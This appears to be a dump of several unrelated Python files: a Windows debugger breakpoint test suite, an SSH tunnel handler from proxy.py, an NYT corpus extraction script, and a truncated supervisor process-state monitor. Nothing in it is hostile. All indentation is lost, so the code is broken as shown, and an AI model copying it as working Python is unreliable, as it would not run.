from conftest import generate_pop_and_exit_fixtures, pop_proc_32, pop_proc_64
from pfwtest import *
proc32_debug = generate_pop_and_exit_fixtures([pop_proc_32], ids=["proc32dbg"], dwCreationFlags=gdef.DEBUG_PROCESS)
proc64_debug = generate_pop_and_exit_fixtures([pop_proc_64], ids=["proc64dbg"], dwCreationFlags=gdef.DEBUG_PROCESS)
if is_process_64_bits:
proc32_64_debug = generate_pop_and_exit_fixtures([pop_proc_32, pop_proc_64], ids=["proc32dbg", "proc64dbg"],
dwCreationFlags=gdef.DEBUG_PROCESS)
else:
# proc32_64_debug = proc32_debug
no_dbg_64_from_32 = lambda *x, **kwargs: pytest.skip("Cannot debug a proc64 from a 32b process")
proc32_64_debug = generate_pop_and_exit_fixtures([pop_proc_32, no_dbg_64_from_32], ids=["proc32dbg", "proc64dbg"], dwCreationFlags=gdef.DEBUG_PROCESS)
yolo = generate_pop_and_exit_fixtures([pop_proc_32, pop_proc_64], ids=["proc32dbg", "proc64dbg"], dwCreationFlags=gdef.CREATE_SUSPENDED)
def test_init_breakpoint_callback(proc32_64_debug):
"""Checking that the initial breakpoint call `on_exception`"""
class MyDbg(windows.debug.Debugger):
def on_exception(self, exception):
assert exception.ExceptionRecord.ExceptionCode == gdef.EXCEPTION_BREAKPOINT
self.current_process.exit()
d = MyDbg(proc32_64_debug)
d.loop()
def get_debug_process_ndll(proc):
proc_pc = proc.threads[0].context.pc
ntdll_addr = proc.query_memory(proc_pc).AllocationBase
return windows.pe_parse.GetPEFile(ntdll_addr, target=proc)
def test_simple_standard_breakpoint(proc32_64_debug):
"""Check that a standard Breakpoint method `trigger` is called with the correct informations"""
class TSTBP(windows.debug.Breakpoint):
def trigger(self, dbg, exc):
assert dbg.current_process.pid == proc32_64_debug.pid
assert dbg.current_process.read_memory(self.addr, 1) == "\xcc"
assert dbg.current_thread.context.pc == self.addr
d.current_process.exit()
LdrLoadDll = get_debug_process_ndll(proc32_64_debug).exports["LdrLoadDll"]
d = windows.debug.Debugger(proc32_64_debug)
d.add_bp(TSTBP(LdrLoadDll))
d.loop()
def test_simple_hwx_breakpoint(proc32_64_debug):
"""Test that simple HXBP are trigger"""
class TSTBP(windows.debug.HXBreakpoint):
def trigger(self, dbg, exc):
assert dbg.current_process.pid == proc32_64_debug.pid
assert dbg.current_thread.context.pc == self.addr
assert dbg.current_thread.context.Dr7 != 0
d.current_process.exit()
LdrLoadDll = get_debug_process_ndll(proc32_64_debug).exports["LdrLoadDll"]
d = windows.debug.Debugger(proc32_64_debug)
d.add_bp(TSTBP(LdrLoadDll))
d.loop()
def test_multiple_hwx_breakpoint(proc32_64_debug):
"""Checking that multiple succesives HXBP are properly triggered"""
class TSTBP(windows.debug.HXBreakpoint):
COUNTER = 0
def __init__(self, addr, expec_before):
self.addr = addr
self.expec_before = expec_before
def trigger(self, dbg, exc):
assert dbg.current_process.pid == proc32_64_debug.pid
assert dbg.current_thread.context.pc == self.addr
assert dbg.current_thread.context.Dr7 != 0
assert TSTBP.COUNTER == self.expec_before
assert dbg.current_process.read_memory(self.addr, 1) != "\xcc"
TSTBP.COUNTER += 1
if TSTBP.COUNTER == 4:
d.current_process.exit()
d = windows.debug.Debugger(proc32_64_debug)
addr = proc32_64_debug.virtual_alloc(0x1000)
proc32_64_debug.write_memory(addr, "\x90" * 8)
d.add_bp(TSTBP(addr, 0))
d.add_bp(TSTBP(addr + 1, 1))
d.add_bp(TSTBP(addr + 2, 2))
d.add_bp(TSTBP(addr + 3, 3))
proc32_64_debug.create_thread(addr, 0)
d.loop()
# Used to verif we actually called the Breakpoints
assert TSTBP.COUNTER == 4
def test_four_hwx_breakpoint_fail(proc32_64_debug):
"""Check that setting 4HXBP in the same thread fails"""
# print("test_four_hwx_breakpoint_fail {0}".format(proc32_64_debug))
class TSTBP(windows.debug.HXBreakpoint):
def __init__(self, addr, expec_before):
self.addr = addr
self.expec_before = expec_before
def trigger(self, dbg, exc):
raise NotImplementedError("Should fail before")
d = windows.debug.Debugger(proc32_64_debug)
addr = proc32_64_debug.virtual_alloc(0x1000)
proc32_64_debug.write_memory(addr, "\x90" * 8 + "\xc3")
d.add_bp(TSTBP(addr, 0))
d.add_bp(TSTBP(addr + 1, 1))
d.add_bp(TSTBP(addr + 2, 2))
d.add_bp(TSTBP(addr + 3, 3))
d.add_bp(TSTBP(addr + 4, 4))
proc32_64_debug.create_thread(addr, 0)
with pytest.raises(ValueError) as e:
d.loop()
assert "DRx" in e.value.message
def test_hwx_breakpoint_are_on_all_thread(proc32_64_debug):
"""Checking that HXBP without target are set on all threads"""
class MyDbg(windows.debug.Debugger):
def on_create_thread(self, exception):
# Check that later created thread have their HWX breakpoint :)
assert self.current_thread.context.Dr7 != 0
class TSTBP(windows.debug.HXBreakpoint):
COUNTER = 0
def __init__(self, addr, expec_before):
self.addr = addr
self.expec_before = expec_before
def trigger(self, dbg, exc):
assert len(dbg.current_process.threads) != 1
#for t in dbg.current_process.threads:
# TEST_CASE.assertNotEqual(t.context.Dr7, 0)
if TSTBP.COUNTER == 0: #First time we got it ! create new thread
TSTBP.COUNTER = 1
dbg.current_process.create_thread(addr, 0)
else:
TSTBP.COUNTER += 1
d.current_process.exit()
d = MyDbg(proc32_64_debug)
addr = proc32_64_debug.virtual_alloc(0x1000)
proc32_64_debug.write_memory(addr, "\x90" * 2 + "\xc3")
d.add_bp(TSTBP(addr, 0))
proc32_64_debug.create_thread(addr, 0)
d.loop()
# Used to verif we actually called the Breakpoints
assert TSTBP.COUNTER == 2
@pytest.mark.parametrize("bptype", [windows.debug.Breakpoint, windows.debug.HXBreakpoint])
def test_simple_breakpoint_name_addr(proc32_64_debug, bptype):
"""Check breakpoint address resolution for format dll!api"""
class TSTBP(bptype):
COUNTER = 0
def trigger(self, dbg, exc):
addr = exc.ExceptionRecord.ExceptionAddress
LdrLoadDlladdr = dbg.current_process.peb.modules[1].pe.exports["LdrLoadDll"]
assert dbg.current_process.pid == proc32_64_debug.pid
assert dbg.current_thread.context.pc == addr
assert LdrLoadDlladdr == addr
TSTBP.COUNTER += 1
d.current_process.exit()
d = windows.debug.Debugger(proc32_64_debug)
d.add_bp(TSTBP("ntdll!LdrLoadDll"))
d.loop()
assert TSTBP.COUNTER == 1
import dbg_injection
def test_hardware_breakpoint_name_addr(proc32_64_debug):
"""Check that name addr in HXBP are trigger in all threads"""
class TSTBP(windows.debug.HXBreakpoint):
COUNTER = 0
def trigger(self, dbg, exc):
addr = exc.ExceptionRecord.ExceptionAddress
assert dbg.current_process.pid == proc32_64_debug.pid
assert dbg.current_thread.context.pc == dbg._resolve(self.addr, dbg.current_process)
TSTBP.COUNTER += 1
if TSTBP.COUNTER == 1:
# Perform a loaddll in a new thread :)
# See if it triggers a bp
t = dbg_injection.perform_manual_getproc_loadlib_for_dbg(dbg.current_process, "wintrust.dll")
self.new_thread = t
if hasattr(self, "new_thread") and dbg.current_thread.tid == self.new_thread.tid:
for t in dbg.current_process.threads:
assert t.context.Dr7 != 0
d.current_process.exit()
d = windows.debug.Debugger(proc32_64_debug)
d.add_bp(TSTBP("ntdll!LdrLoadDll"))
# Code that will load wintrust !
d.loop()
def test_single_step(proc32_64_debug):
"""Check that BP/dbg can trigger single step and that instruction follows"""
NB_SINGLE_STEP = 3
class MyDbg(windows.debug.Debugger):
DATA = []
def on_single_step(self, exception):
# Check that later created thread have their HWX breakpoint :)
addr = exception.ExceptionRecord.ExceptionAddress
assert self.current_thread.context.pc == addr
if len(MyDbg.DATA) < NB_SINGLE_STEP:
MyDbg.DATA.append(addr)
return self.single_step()
self.current_process.exit()
return
class TSTBP(windows.debug.Breakpoint):
"""Check that BP/dbg can trigger single step and that instruction follows"""
def trigger(self, dbg, exc):
return dbg.single_step()
d = MyDbg(proc32_64_debug)
addr = proc32_64_debug.virtual_alloc(0x1000)
proc32_64_debug.write_memory(addr, "\x90" * 3 + "\xc3")
d.add_bp(TSTBP(addr))
proc32_64_debug.create_thread(addr, 0)
d.loop()
# Used to verif we actually called the Breakpoints
assert len(MyDbg.DATA) == NB_SINGLE_STEP
for i in range(NB_SINGLE_STEP):
assert MyDbg.DATA[i] == addr + 1 + i
@pytest.mark.parametrize("bptype", [windows.debug.Breakpoint, windows.debug.HXBreakpoint])
def test_single_step_from_bp(proc32_64_debug, bptype):
"""Check that HXBPBP/dbg can trigger single step"""
NB_SINGLE_STEP = 3
class MyDbg(windows.debug.Debugger):
DATA = []
def on_single_step(self, exception):
# Check that later created thread have their HWX breakpoint :)
addr = exception.ExceptionRecord.ExceptionAddress
assert self.current_thread.context.pc == addr
if len(MyDbg.DATA) < NB_SINGLE_STEP:
MyDbg.DATA.append(addr)
return self.single_step()
self.current_process.exit()
return
# class TSTBP(windows.debug.HXBreakpoint):
class TSTBP(bptype):
"""Check that BP/dbg can trigger single step and that instruction follows"""
def trigger(self, dbg, exc):
return dbg.single_step()
d = MyDbg(proc32_64_debug)
addr = proc32_64_debug.virtual_alloc(0x1000)
proc32_64_debug.write_memory(addr, "\x90" * 3 + "\xc3")
d.add_bp(TSTBP(addr))
proc32_64_debug.create_thread(addr, 0)
d.loop()
# Used to verif we actually called the Breakpoints
assert len(MyDbg.DATA) == NB_SINGLE_STEP
for i in range(NB_SINGLE_STEP):
assert MyDbg.DATA[i] == addr + 1 + i
# MEMBP
def test_memory_breakpoint_write(proc32_64_debug):
"""Check MemoryBP WRITE"""
class TSTBP(windows.debug.MemoryBreakpoint):
#DEFAULT_PROTECT = PAGE_READONLY
#DEFAULT_PROTECT = PAGE_READONLY
DEFAULT_EVENTS = "W"
COUNTER = 0
"""Check that BP/dbg can trigger single step and that instruction follows"""
def trigger(self, dbg, exc):
fault_addr = exc.ExceptionRecord.ExceptionInformation[1]
eax = dbg.current_thread.context.func_result # Rax | Eax
if eax == 42:
dbg.current_process.exit()
return
assert fault_addr == data + eax
TSTBP.COUNTER += 1
return
if proc32_64_debug.bitness == 32:
asm, reg = (x86, "EAX")
else:
asm, reg = (x64, "RAX")
d = windows.debug.Debugger(proc32_64_debug)
addr = proc32_64_debug.virtual_alloc(0x1000)
data = proc32_64_debug.virtual_alloc(0x1000)
injected = asm.MultipleInstr()
injected += asm.Mov(reg, 0)
injected += asm.Mov(asm.deref(data), reg)
injected += asm.Add(reg, 4)
injected += asm.Mov(asm.deref(data + 4), reg)
injected += asm.Add(reg, 4)
# This one should NOT trigger the MemBP of size 8
injected += asm.Mov(asm.deref(data + 8), reg)
injected += asm.Mov(reg, 42)
injected += asm.Mov(asm.deref(data), reg)
injected += asm.Ret()
proc32_64_debug.write_memory(addr, injected.get_code())
d.add_bp(TSTBP(data, size=0x8))
proc32_64_debug.create_thread(addr, 0)
d.loop()
# Used to verif we actually called the Breakpoints for the good addresses
assert TSTBP.COUNTER == 2
def test_memory_breakpoint_exec(proc32_64_debug):
"""Check MemoryBP EXEC"""
NB_NOP_IN_PAGE = 3
class TSTBP(windows.debug.MemoryBreakpoint):
"""Check that BP/dbg can trigger single step and that instruction follows"""
#DEFAULT_PROTECT = PAGE_NOACCESS
DEFAULT_EVENTS = "X"
DATA = []
def trigger(self, dbg, exc):
fault_addr = exc.ExceptionRecord.ExceptionInformation[1]
TSTBP.DATA.append(fault_addr)
if len(TSTBP.DATA) == NB_NOP_IN_PAGE + 1:
dbg.current_process.exit()
d = windows.debug.Debugger(proc32_64_debug)
addr = proc32_64_debug.virtual_alloc(0x1000)
proc32_64_debug.write_memory(addr, "\x90" * NB_NOP_IN_PAGE + "\xc3")
d.add_bp(TSTBP(addr, size=0x1000))
proc32_64_debug.create_thread(addr, 0)
d.loop()
# Used to verif we actually called the Breakpoints
assert len(TSTBP.DATA) == NB_NOP_IN_PAGE + 1
for i in range(NB_NOP_IN_PAGE + 1):
assert TSTBP.DATA[i] == addr + i
# breakpoint remove
import threading
@python_injection
@pytest.mark.parametrize("bptype", [windows.debug.FunctionParamDumpHXBP, windows.debug.FunctionParamDumpBP])
def test_standard_breakpoint_self_remove(proc32_64_debug, bptype):
data = []
def do_check():
proc32_64_debug.execute_python_unsafe("open(u'FILENAME1')").wait()
proc32_64_debug.execute_python_unsafe("open(u'FILENAME2')").wait()
proc32_64_debug.execute_python_unsafe("open(u'FILENAME3')").wait()
proc32_64_debug.exit()
class TSTBP(bptype):
TARGET = windows.winproxy.CreateFileW
def trigger(self, dbg, exc):
addr = exc.ExceptionRecord.ExceptionAddress
ctx = dbg.current_thread.context
filename = self.extract_arguments(dbg.current_process, dbg.current_thread)["lpFileName"]
data.append(filename)
if filename == u"FILENAME2":
dbg.del_bp(self)
d = windows.debug.Debugger(proc32_64_debug)
d.add_bp(TSTBP("kernel32!CreateFileW"))
threading.Thread(target=do_check).start()
d.loop()
assert data == [u"FILENAME1", u"FILENAME2"]
@python_injection
@pytest.mark.parametrize("bptype", [windows.debug.FunctionParamDumpHXBP, windows.debug.FunctionParamDumpBP])
def test_standard_breakpoint_remove(proc32_64_debug, bptype):
data = []
def do_check():
proc32_64_debug.execute_python_unsafe("open(u'FILENAME1')").wait()
proc32_64_debug.execute_python_unsafe("open(u'FILENAME2')").wait()
d.del_bp(the_bp)
proc32_64_debug.execute_python_unsafe("open(u'FILENAME3')").wait()
proc32_64_debug.exit()
class TSTBP(bptype):
TARGET = windows.winproxy.CreateFileW
def trigger(self, dbg, exc):
addr = exc.ExceptionRecord.ExceptionAddress
ctx = dbg.current_thread.context
filename = self.extract_arguments(dbg.current_process, dbg.current_thread)["lpFileName"]
data.append(filename)
d = windows.debug.Debugger(proc32_64_debug)
the_bp = TSTBP("kernel32!CreateFileW")
d.add_bp(the_bp)
threading.Thread(target=do_check).start()
d.loop()
assert data == [u"FILENAME1", u"FILENAME2"]
def get_generate_read_at_for_proc(target):
if target.bitness == 32:
def generate_read_at(addr):
res = x86.MultipleInstr()
res += x86.Mov("EAX", x86.deref(addr))
res += x86.Ret()
return res.get_code()
else:
def generate_read_at(addr):
res = x64.MultipleInstr()
res += x64.Mov("RAX", x64.deref(addr))
res += x64.Ret()
return res.get_code()
return generate_read_at
def get_generate_write_at_for_proc(target):
if target.bitness == 32:
def generate_write_at(addr):
res = x86.MultipleInstr()
res += x86.Mov(x86.deref(addr), "EAX")
res += x86.Ret()
return res.get_code()
else:
def generate_write_at(addr):
res = x64.MultipleInstr()
res += x64.Mov(x64.deref(addr), "RAX")
res += x64.Ret()
return res.get_code()
return generate_write_at
def test_mem_breakpoint_remove(proc32_64_debug):
data = []
generate_read_at = get_generate_read_at_for_proc(proc32_64_debug)
def do_check():
proc32_64_debug.execute(generate_read_at(data_addr)).wait()
proc32_64_debug.execute(generate_read_at(data_addr + 4)).wait()
d.del_bp(the_bp)
proc32_64_debug.execute(generate_read_at(data_addr + 8)).wait()
proc32_64_debug.exit()
class TSTBP(windows.debug.MemoryBreakpoint):
#DEFAULT_PROTECT = PAGE_NOACCESS
DEFAULT_EVENTS = "RWX"
def trigger(self, dbg, exc):
addr = exc.ExceptionRecord.ExceptionAddress
fault_addr = exc.ExceptionRecord.ExceptionInformation[1]
data.append(fault_addr)
d = windows.debug.Debugger(proc32_64_debug)
data_addr = proc32_64_debug.virtual_alloc(0x1000)
the_bp = TSTBP(data_addr, size=0x1000)
d.add_bp(the_bp)
threading.Thread(target=do_check).start()
d.loop()
assert data == [data_addr, data_addr + 4]
def test_mem_breakpoint_self_remove(proc32_64_debug):
data = []
generate_read_at = get_generate_read_at_for_proc(proc32_64_debug)
def do_check():
proc32_64_debug.execute(generate_read_at(data_addr)).wait()
proc32_64_debug.execute(generate_read_at(data_addr + 4)).wait()
proc32_64_debug.execute(generate_read_at(data_addr + 8)).wait()
proc32_64_debug.exit()
class TSTBP(windows.debug.MemoryBreakpoint):
#DEFAULT_PROTECT = PAGE_NOACCESS
DEFAULT_EVENTS = "RWX"
def trigger(self, dbg, exc):
addr = exc.ExceptionRecord.ExceptionAddress
fault_addr = exc.ExceptionRecord.ExceptionInformation[1]
data.append(fault_addr)
if fault_addr == data_addr + 4:
dbg.del_bp(self)
d = windows.debug.Debugger(proc32_64_debug)
data_addr = proc32_64_debug.virtual_alloc(0x1000)
the_bp = TSTBP(data_addr, size=0x1000)
d.add_bp(the_bp)
threading.Thread(target=do_check).start()
d.loop()
assert data == [data_addr, data_addr + 4]
def test_read_write_bp_same_page(proc32_64_debug):
data = []
generate_read_at = get_generate_read_at_for_proc(proc32_64_debug)
generate_write_at = get_generate_write_at_for_proc(proc32_64_debug)
def do_check():
proc32_64_debug.execute(generate_read_at(data_addr)).wait()
proc32_64_debug.execute(generate_write_at(data_addr + 4)).wait()
proc32_64_debug.execute(generate_read_at(data_addr + 0x500)).wait()
proc32_64_debug.execute(generate_write_at(data_addr + 0x504)).wait()
proc32_64_debug.exit()
class MemBP(windows.debug.MemoryBreakpoint):
#DEFAULT_PROTECT = PAGE_NOACCESS
DEFAULT_EVENTS = "RWX"
def trigger(self, dbg, exc):
addr = exc.ExceptionRecord.ExceptionAddress
fault_addr = exc.ExceptionRecord.ExceptionInformation[1]
#print("Got <{0:#x}> <{1}>".format(fault_addr, exc.ExceptionRecord.ExceptionInformation[0]))
data.append((self, fault_addr))
d = windows.debug.Debugger(proc32_64_debug)
data_addr = proc32_64_debug.virtual_alloc(0x1000)
the_write_bp = MemBP(data_addr + 0x500, size=0x500, events="W")
the_read_bp = MemBP(data_addr, size=0x500, events="RW")
d.add_bp(the_write_bp)
d.add_bp(the_read_bp)
threading.Thread(target=do_check).start()
d.loop()
# generate_read_at (data_addr + 0x500)) (write_bp (PAGE_READONLY)) should not be triggered
expected_result = [(the_read_bp, data_addr), (the_read_bp, data_addr + 4),
(the_write_bp, data_addr + 0x504)]
assert data == expected_result
def test_exe_in_module_list(proc32_64_debug):
class MyDbg(windows.debug.Debugger):
def on_exception(self, exception):
exename = os.path.basename(proc32_64_debug.peb.imagepath.str)
this_process_modules = self._module_by_process[self.current_process.pid]
assert exename and exename in this_process_modules.keys()
self.current_process.exit()
d = MyDbg(proc32_64_debug)
d.loop()
def test_bp_exe_by_name(proc32_64_debug):
class TSTBP(windows.debug.Breakpoint):
COUNTER = 0
def trigger(self, dbg, exc):
TSTBP.COUNTER += 1
assert TSTBP.COUNTER == 1
# Kill the target in 0.5s
# It's not too long
# It's long enought to get trigger being recalled if implem is broken
threading.Timer(0.5, proc32_64_debug.exit).start()
exepe = proc32_64_debug.peb.exe
entrypoint = exepe.get_OptionalHeader().AddressOfEntryPoint
exename = os.path.basename(proc32_64_debug.peb.imagepath.str)
d = windows.debug.Debugger(proc32_64_debug)
# The goal is to test bp of format 'exename!offset' so we craft a string based on the entrypoint
d.add_bp(TSTBP("{name}!{offset}".format(name=exename, offset=entrypoint)))
d.loop()
assert TSTBP.COUNTER == 1
|
handler.py
|
# -*- coding: utf-8 -*-
"""
proxy.py
~~~~~~~~
⚡⚡⚡ Fast, Lightweight, Pluggable, TLS interception capable proxy server focused on
Network monitoring, controls & Application development, testing, debugging.
:copyright: (c) 2013-present by Abhinav Singh and contributors.
:license: BSD, see LICENSE for more details.
"""
import argparse
from typing import TYPE_CHECKING
import socket
import logging
import select
import threading
logger = logging.getLogger(__name__)
if TYPE_CHECKING: # pragma: no cover
from ...common.types import HostPort
try:
from paramiko.channel import Channel
except ImportError:
pass
class SshHttpProtocolHandler:
"""Handles incoming connections over forwarded SSH transport."""
def __init__(self, flags: argparse.Namespace) -> None:
self.flags = flags
def tunnel_forward_worker(self, chan):
host, port = '127.0.0.1', self.flags.port
sock = socket.socket()
try:
sock.connect((host, port))
except Exception as e:
logger.info("Forwarding request to %s:%d failed: %r" % (host, port, e))
return
logger.info(
"Connected! Tunnel open %r -> %r -> %r"
% (chan.origin_addr, chan.getpeername(), (host, port))
)
while True:
r, w, x = select.select([sock, chan], [], [])
if sock in r:
data = sock.recv(1024)
if len(data) == 0:
break
chan.send(data)
if chan in r:
data = chan.recv(1024)
if len(data) == 0:
break
sock.send(data)
chan.close()
sock.close()
logger.info("Tunnel closed from %r" % (chan.origin_addr,))
def on_connection(
self,
chan: 'Channel',
origin: 'HostPort',
server: 'HostPort',
) -> None:
thr = threading.Thread(
target=self.tunnel_forward_worker, args=(chan,)
)
thr.setDaemon(True)
thr.start()
|
select_nyt.py
|
#!/usr/bin/env python
from nltk.corpus.reader import XMLCorpusReader
import os
import sys
from collections import defaultdict
#from multiprocessing import Process, Queue, cpu_count
### Functions to create extractors ###
def make_filter_extractor(base_extractor, reject_cond, feature_name,
allow_blank):
def extractor(elt):
contents = base_extractor(elt)
if contents is None or not reject_cond(contents):
return contents
else:
if allow_blank:
return None
else:
raise ValueError(feature_name)
return extractor
def make_attr_extractor(attr_name):
return lambda elt: elt.get(attr_name)
def make_class_text_extractor(class_name):
def text_if_online_class(elt):
if elt.get('class') != class_name:
return None
return elt.text
return text_if_online_class
def make_body_extractor(kicker):
if len(kicker) == 0:
return lambda elt: '\n\n'.join([c.text for c in elt.getchildren()])
else:
kicker = kicker.__iter__().next()
def extractor(elt):
pars = [c.text for c in elt.getchildren()]
if pars[-1].strip() == kicker:
pars.pop()
return '\n\n'.join(pars)
return extractor
### Global extractors ###
text_extractor = lambda elt: elt.text
content_extractor = make_attr_extractor('content')
docid_extractor = make_attr_extractor('id-string')
kicker_extractor = make_attr_extractor('series.name')
indexing_extractor = make_class_text_extractor('indexing_service')
online_section_extractor = make_filter_extractor(
lambda elt: [sec.strip() for sec in elt.get('content').split(';')],
lambda sections: (('Washington' not in sections)
or 'Corrections' in sections),
'online_section', False)
descriptor_extractor = make_filter_extractor(
indexing_extractor, lambda contents: contents.startswith("NO INDEX TERMS"),
"descriptor", True)
mat_type_extractor = make_filter_extractor(
text_extractor, lambda contents: contents in (
"Summary", "List", "Paid Death Notice", "Paid Memorial Notice"),
"material_type", False)
### Generic functions for running extractors on the document and handling the results ###
def extract_feature(doc, xpath, extractor=text_extractor):
result = set()
elts = doc.findall(xpath)
for elt in elts:
extracted = extractor(elt)
if extracted is None:
continue
# Extractor can return multiple items. If it did, add them all.
if hasattr(extracted, '__iter__'):
result.update(extracted)
else:
result.add(extracted)
return result
def extract_taxonomies(doc):
tax_classes = doc.findall(
'.//head/docdata/identified-content/classifier'
'[@type="taxonomic_classifier"]')
unique_classes = set()
# Shave off first 4 chars, because they'll just be "Top/"
tax_classes = [c.text[4:] for c in tax_classes]
for tax_class in tax_classes:
classes_to_del = set()
add_to_unique = True
for c in unique_classes:
if c.startswith(tax_class):
add_to_unique = False
break # tax_class is the same as or a prefix of something we've seen already -- ignore it
elif tax_class.startswith(c):
# c is a prefix of this next class, so we should delete c later
classes_to_del.add(c)
unique_classes = unique_classes - classes_to_del
if add_to_unique:
unique_classes.add(tax_class)
return unique_classes
def add_features(name, doc_dict, values, max_allowed=1, required=True):
if len(values) > max_allowed:
raise ValueError(name)
elif len(values) == 0:
if required:
raise ValueError(name)
for i, value in enumerate(values):
doc_dict[name + ("_%d" % i)] = value
for i in range(len(values), max_allowed):
doc_dict[name + ("_%d" % i)] = ''
### Driver ###
sections = set()
def process_doc(doc):
doc_dict = {}
'''
add_features('doc_id', doc_dict,
extract_feature(doc, './/head/docdata/doc-id', docid_extractor))
add_features('headline', doc_dict,
extract_feature(doc, './/body[1]/body.head/hedline/hl1'))
add_features('publication_year', doc_dict,
extract_feature(doc, './/head/meta[@name="publication_year"]', content_extractor))
add_features('publication_month', doc_dict,
extract_feature(doc, './/head/meta[@name="publication_month"]', content_extractor))
add_features('taxonomic_labels', doc_dict, extract_taxonomies(doc), 9)
'''
kicker = extract_feature(doc, './/head/docdata/series', kicker_extractor)
add_features('body', doc_dict,
extract_feature(doc, './/body/body.content/block[@class="full_text"]',
make_body_extractor(kicker)))
add_features('material_type', doc_dict,
extract_feature(doc, './/head/docdata/identified-content/classifier[@type="types_of_material"]',
mat_type_extractor),
4, False)
#add_features('day_of_week', doc_dict,
# extract_feature(doc, './/head/meta[@name="publication_day_of_week"]', content_extractor))
#add_features('descriptor', doc_dict,
# extract_feature(doc, './/head/docdata/identified-content/classifier[@type="descriptor"]',
# descriptor_extractor),
# 8, False)
#add_features('general_descriptor', doc_dict,
# extract_feature(doc, './/head/docdata/identified-content/classifier[@type="general_descriptor"]'),
# 10, False)
#add_features('news_desk', doc_dict,
# extract_feature(doc, './/head/meta[@name="dsk"]', content_extractor))
add_features('online_section', doc_dict,
extract_feature(doc, './/head/meta[@name="online_sections"]',
online_section_extractor),
4)
sections.update([doc_dict[x] for x in doc_dict if x.startswith('online_section')])
#add_features('print_section', doc_dict,
# extract_feature(doc, './/head/meta[@name="print_section"]', content_extractor))
#add_features('print_section', doc_dict,
# extract_feature(doc, './/head/meta[@name="print_section"]', content_extractor))
#add_features('kicker', doc_dict, kicker, required=False)
return doc_dict
def doc_path_to_dict(path):
directory, fname = os.path.split(path)
reader = XMLCorpusReader(directory, fname)
doc = reader.xml()
try:
return process_doc(doc)
except ValueError, e:
return e.args[0]
def worker(input, output):
for path in iter(input.get, 'STOP'):
output.put((path, doc_path_to_dict(path)))
def main(argv):
root_path = argv[1]
target_path = argv[2] if len(argv) > 2 else None
file_paths = []
for dirpath, _dirs, files in os.walk(root_path, topdown=False):
file_paths.extend([os.path.join(dirpath, filename) for filename in files
if filename.endswith('.xml')])
num_paths = len(file_paths)
print "Found", num_paths, "files"
skipped = defaultdict(int)
class Dummy(object): pass
num_done = Dummy()
num_done.val = 0
def handle_result(path, doc_dict):
if isinstance(doc_dict, str):
skipped[doc_dict] += 1
else:
dir_path, filename = os.path.split(path)
if target_path:
dir_path = target_path
path_base = os.path.join(dir_path, os.path.splitext(filename)[0])
with open(path_base + '.txt', 'w') as txt_file:
txt_file.write(doc_dict['body_0'].encode('utf-8'))
open(path_base + '.ann', 'a').close() # create empty .ann file
num_done.val += 1
sys.stdout.write('\r%d / %d' % (num_done.val, num_paths))
'''
path_q = Queue()
result_q = Queue()
for i in range(cpu_count()):
Process(target=worker, args=(path_q, result_q)).start()
for path in file_paths:
path_q.put(path)
path_q.put('STOP')
while not path_q.empty() or not result_q.empty():
handle_result(*result_q.get())
'''
for path in file_paths:
handle_result(path, doc_path_to_dict(path))
sys.stdout.write("\n")
print sections
print "Skipped:", dict(skipped)
print "Total skipped:", sum(skipped.values())
if __name__ == '__main__':
main(sys.argv)
|
process-state.py
|
#!/usr/bin/env python
# Copyright (c) 2019 AT&T Intellectual Property.
# Copyright (c) 2019 Nokia.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# This script does have the event handler in supervisor to follow the process state.
# Main parent process follows the events from the supervised daemon and the child process
# provides the process status info via HTTP server interface.
# When any of the process state change to PROCESS_STATE_FATAL, then the http server will
# respond with status code 500 to indicate faulty operation, normal status code is 200 (working).
# Set the script configuration to supervisord.conf as follow:
#
# [eventlistener:process-state]
# command=python process-state.py
# autorestart=true
# startretries=3
# events=PROCESS_STATE
#
# Following is the example supervisor daemon status for each process.
#
# ver:3.0 server:supervisor serial:16 pool:process-state poolserial:16 eventname:PROCESS_STATE_FATAL len:62
# processname:sleep-exit groupname:sleep-exit from_state:BACKOFF
#
# Process states are: PROCESS_STATE_STARTING, PROCESS_STATE_RUNNING, PROCESS_STATE_STOPPING,
# PROCESS_STATE_STOPPEDPROCESS_STATE_BACKOFF, PROCESS_STATE_FATAL
#
import os
import sys
import signal
import datetime
import argparse
import psutil
import threading
import BaseHTTPServer
# needed for python socket library broken pipe WA
from multiprocessing import Process, Manager, Value, Lock
global HTTP_STATUS
global PROCESS_STATE
global DEBUG
TABLE_STYLE = ('<style>'
'div { font-family: Arial, Helvetica, sans-serif; font-size:8px;}'
'p { font-family: Arial, Helvetica, sans-serif;}'
'h1 { font-family: Arial, Helvetica, sans-serif; font-size:30px; font-weight: bold; color:#A63434;}'
'table, th, td { border: 1px solid black; border-collapse: collapse; font-size:12px;}'
'th, td { padding: 3px 10px 3px 10px; text-align: left;}'
'th.thr, td.tdr { padding: 3px 10px 3px 10px; text-align: right;}'
'th.thc, td.tdc { padding: 3px 10px 3px 10px; text-align: center;}'
'table#t1 tr:nth-child(even) { background-color: #eee;}'
'table#t1 tr:nth-child(odd) { background-color: #ADC0DC;}'
'table#t1 th { background-color: #214D8B; color: white;}</style>')
def get_pid_info(pid):
pdata = None
if pid is not 0:
try:
process = psutil.Process(pid)
# these are the item lists
files = process.open_files()
# get the open files and connections and count number of fd str
sockets = process.connections()
descriptors = str(files)+str(sockets)
count = descriptors.count("fd=")
pdata = {"pid": process.pid,
"status": process.status(),
"cpu": process.cpu_percent(interval=0.2),
"descriptors": count,
"memory": process.memory_info().rss}
except (psutil.ZombieProcess, psutil.AccessDenied, psutil.NoSuchProcess):
pdata = None
return pdata
def get_process_html_info():
global PROCESS_STATE
try:
html_data = ("<table width='800px' id='t1'>"
"<thead><tr><th>Process</th><th>Date and time</th><th>From state</th><th>to state</th>"
"<th class=thc>Pid</th><th class=thc>Fds</th><th class=thc>Mem</th><th class=thc>Cpu</th></tr></thead><tbody>")
for proc,data in PROCESS_STATE.items():
pid = 0
descriptors = ""
memory_usage = ""
cpu_usage = ""
if data['pid'] is not None:
pdata = get_pid_info(data['pid'])
if pdata is not None:
pid = pdata['pid']
descriptors = str(pdata['descriptors'])
memory_usage = str(pdata['memory']/1024)+" Kb"
cpu_usage = str(pdata['cpu'])+" %"
html_data += ('<tr>'
'<td>'+str(proc)+'</td>'
'<td>'+str(data['time'])+'</td>'
